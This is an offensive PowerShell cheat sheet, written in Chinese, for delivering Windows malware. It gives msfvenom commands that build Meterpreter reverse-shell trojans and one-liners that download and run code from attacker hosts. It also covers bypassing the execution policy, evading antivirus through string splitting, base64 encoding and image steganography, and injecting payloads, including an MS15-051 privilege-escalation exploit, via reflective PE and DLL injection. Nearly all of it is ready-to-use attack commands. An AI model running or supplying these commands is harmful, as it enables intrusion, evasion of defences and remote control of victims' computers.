Powershell基础操作

查看版本$PSVersionTable

远程执行

>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('');Invoke-xxx"

加载exe

msfvenom生成exe木马
>msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f exe > /var/www/html/1.exe  
使用powersploit的Invoke-ReflectivePEInjection.ps1脚本
>powershell.exe -w hidden -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/clymberps/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://192.168.0.107/1.exe -ForceASLR"

EXE2PS1

http://192.168.0.107/ps/powersploit/CodeExecution/Convert-BinaryToString.ps1
将exe转换为base64
>Import-Module .\Convert-BinaryToString.ps1
>Convert-BinaryToString -FilePath .\ms15051.exe

http://192.168.0.107/ps/powersploit/CodeExecution/Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection.ps1文件头部添加
Function MS15051{
<#
.SYNOPSIS    
.EXAMPLE
C:\PS> MS15051 -Command "whoami"
#>
 [CmdletBinding()]
    param(
        [Parameter(Mandatory = $False)]
        [string]
        $Command
  )
$InputString = "文件的base64编码"
$PEBytes = [System.Convert]::FromBase64String($InputString)
文件尾部添加
write-host ("[+] Executing Command: "+$Command)  -foregroundcolor "Green"
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs $Command 
write-host ("[+] Done !")  -foregroundcolor "Green"
}

远程下载执行
>powershell -nop -w hidden -ep bypass "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.0.107/ps/powersploit/CodeExecution/ms15051.ps1'); MS15051 –Command \"whoami\""

绕过策略

>powershell Set-ExecutionPolicy Unrestricted需管理员权限，不受限执行
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/Invoke-xxx.ps1');invoke-xxx"
>powershell -exec bypass -File ./a.ps1&>Import-Module xxx

Base64

>use exploit/multi/script/web_delivery|target=2(PSH)
&
>cat payload.txt | iconv --to-code UTF-16LE |base64
>powershell -ep bypass -enc base64code

写入bat绕过

powershell -exec bypass -File ./a.ps1 
将该命令保存为c.bat

拼接拆分字符串

powershell.exe  
"
$c1='powershell -c IEX'; 
$c2='(New-Object Net.WebClient).Downlo'; 
$c3='adString("http://192.168.197.192/a.ps1")'; 
echo ($c1,$c2,$c3) 
" 
先将命令拆分为字符串，然后进行拼接。echo修改为IEX执行。
powershell $c2='IEX (New-Object Net.WebClient).Downlo';$c3='adString(''http://x.x.x.x/a'')'; $Text=$c2+$c3; IEX(-join $Text)

Replace替换函数

powershell -noexit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://192.168.0.108/1.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

HTTP字符拼接绕过

也可以对http字符进行绕过，同样可以bypass
powershell "$a='IEX((new-object net.webclient).downloadstring("ht';$b='tp://192.168.197.192/a.ps1"))';IEX ($a+$b)"

图片免杀

通过图片免杀执行powershell的脚本Invoke-PSImage.ps1，主要把payload分散存到图片的像素中,最后到远端执行时,再重新遍历重组像素中的payload执行。
https://github.com/peewpw/Invoke-PSImage
1900*1200的图片x.jpg。
C:\>powershell 
PS C:\> Import-Module .\Invoke-PSImage.ps1 
PS C:\> Invoke-PSImage -Script .\a.ps1 -Image .\x.jpg -Out .\reverse_shell.png -Web 
a.ps1是msf木马，-Out 生成reverse_shell.png图片，-Web 输出从web读取的命令。
将reverse_shell.png移动至web目录，替换url地址。在powershell下执行即可。

加载shellcode

msfvenom生成脚本木马
>msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.72.164 LPORT=4444 -f powershell -o /var/www/html/test  
在windows靶机上运行一下命令
PS >IEX(New-Object Net.WebClient).DownloadString("http://144.34.xx.xx/PowerSploit/CodeExecution/Invoke-Shellcode.ps1") 
PS >IEX(New-Object Net.WebClient).DownloadString("http://192.168.72.164/test") 
Invoke-Shellcode -Shellcode $buf -Force  运行木马 
使用Invoke-Shellcode.ps1脚本执行shellcode
即可反弹meterpreter shell

加载dll

使用msfvenom 生成dll木马脚本
>msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.72.164 lport=4444 -f dll -o /var/www/html/test.dll 
将生成的dll上传到目标的C盘。在靶机上执行以下命令
PS >IEX(New-Object Net.WebClient).DownloadString("http://144.34.xx.xx/PowerSploit/CodeExecution/Invoke-DllInjection.ps1") 
Start-Process c:\windows\system32\notepad.exe -WindowStyle Hidden  
创建新的进程启动记事本，并设置为隐藏
Invoke-DllInjection -ProcessID xxx -Dll c:\test.dll 使用notepad的PID  
Msf
>use exploit/multi/handler
>set payload windows/x64/meterpreter/reverse_tcp
>run

最后更新于3年前

这有帮助吗？